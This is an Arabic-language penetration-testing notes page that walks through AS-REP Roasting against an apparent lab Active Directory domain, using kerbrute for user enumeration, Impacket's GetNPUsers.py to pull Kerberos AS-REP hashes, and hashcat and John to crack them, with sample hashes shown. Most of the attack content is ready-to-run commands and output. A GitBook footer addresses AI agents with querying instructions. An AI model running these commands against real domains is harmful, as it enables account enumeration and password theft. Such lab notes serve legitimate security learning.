> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/ar/active-directory/kerberos/as-rep-roasting-from-linux.md).

# AS-REP Roasting من لينكس

### إنشاء قائمة بالمستخدمين

ننشئ ملفًا:

{% code overflow="wrap" %}

```bash
user1
user2
beverlie.carmel
المسؤول
astrid.niki
```

{% endcode %}

### التحقق باستخدام Kerbrute

{% code overflow="wrap" %}

```bash
kerbrute userenum -d whoami.local --dc dc01.whoami.local users
```

{% endcode %}

في Wireshark، يمكننا ملاحظة أن المستخدمين العاديين يطلبون المصادقة المسبقة، بينما `astrid.niki` يمكنه إرجاع استجابة قابلة للاستخدام.

<figure><img src="/files/878f446addd63f38fb48bd0987e26d734a8604c6" alt=""><figcaption></figcaption></figure>

{% code overflow="wrap" %}

```bash
fba3c5e54d99add970100f90d1de4f0838e6dc3338dad6eace2abdb8f808d895c619a11291ca8e1b0bd9a914bb2c36b306b471bce9e84db1fe348df08287e76d07857f9633222f19e8a5912cd88ce2cec025b0bcc04f81c35ca215df43e366de5270b0b4ad6188311402e058efc7a0e967c2235f97c74c4e0c0fdf072cb41e04496f53cfebe36e25538027c092469b3415f7493017a7824c71d73fcc7f2da6f04555393356e6204277ef74d15d081401bc0dc8498df074e14607c276da9e05314102eeae6f676d26c91312018cf03d25387c4fe197892cf14f7010609c78d55f4c3b0abb665e261001ff1c9ea0d6ff36749d6dc3673e2ab3d0114ec33b905114affe735543051a356ba87fb615a8a281
```

{% endcode %}

<figure><img src="/files/4b8230d00e6d87bb1b905281a8a9dab79944dcc3" alt=""><figcaption></figcaption></figure>

### التنقيب الآلي باستخدام GetNPUsers

أداة `GetNPUsers.py` تؤتمت هجوم AS-REP Roasting.

من دون بيانات اعتماد صالحة:

{% code overflow="wrap" %}

```bash
GetNPUsers.py whoami.local/ -dc-ip 172.16.0.100 -users users -format john -outputfile asrep2.hash
```

{% endcode %}

هذا الأمر:

* يقرأ المستخدمين من ملف `users`;
* يتصل بوحدة تحكم المجال؛
* يستخرج تجزئات AS-REP من الحسابات الضعيفة؛
* يحفظ النتيجة بصيغة John.

<figure><img src="/files/a76cbc14b41348c06951b977fa058680721a9fc5" alt=""><figcaption></figcaption></figure>

{% code overflow="wrap" %}

```powershell
$krb5asrep$astrid.niki@WHOAMI.LOCAL:bc9843638ed7c638b55662f327b2540f$a8fb43644825579cd42a645a07f8d90518ca48a637803277bea0af640a3c21ce529f9d4c560084c765b0b64437d57b3d9fa5271d3efd026633bb8d9b5ccafa07d8e52682437b74f69e72307884cbd2b35fa3a3c6fa3cc236ed6d01d7ae125ec5b0e94f3f2e9143c170bd95dc3cebad2e60c5edf2eb7d3b873f2084aaf1661aa66693d0c51b0080f61fa04801a59fef0c356b212e541e036a40e67ca5e30a12e6ae8bbc54dac3144e815635f0c5785c27b39e9a5cdc3c653f46cc9ebaf59ddcc5ebee06ab7b7057fa27189a8c502e8db8d19c83d493b43ba80b08629ff7e26be9241bd75aec33824f2b484c5d
```

{% endcode %}

### الاختراق باستخدام Hashcat

بالنسبة إلى Hashcat، فإن وضع Kerberos AS-REP هو 18200:

{% code overflow="wrap" %}

```bash
hashcat -m 18200 hash /usr/share/wordlists/rockyou.txt
```

{% endcode %}

### الاختراق باستخدام John

```bash
john --wordlist=/usr/share/wordlists/rockyou.txt asrep2.hash
```

<figure><img src="/files/324538e4624dc79ec7e785c51927bb0a3fb96223" alt=""><figcaption></figcaption></figure>

### مع بيانات اعتماد صالحة

إذا كانت لديك بيانات اعتماد لمستخدم في المجال، يمكنك أيضًا الاستعلام عن AS-REPs القابلة للاختراق للمستخدمين المعنيين:

{% code overflow="wrap" %}

```bash
GetNPUsers.py whoami.local/user1:Password123 -dc-ip 172.16.0.100 -format john -outputfile asrep2.hash
```

{% endcode %}

<figure><img src="/files/1b7cf378853dd87d91c74b6f8bca62191af1c3fa" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/ar/active-directory/kerberos/as-rep-roasting-from-linux.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
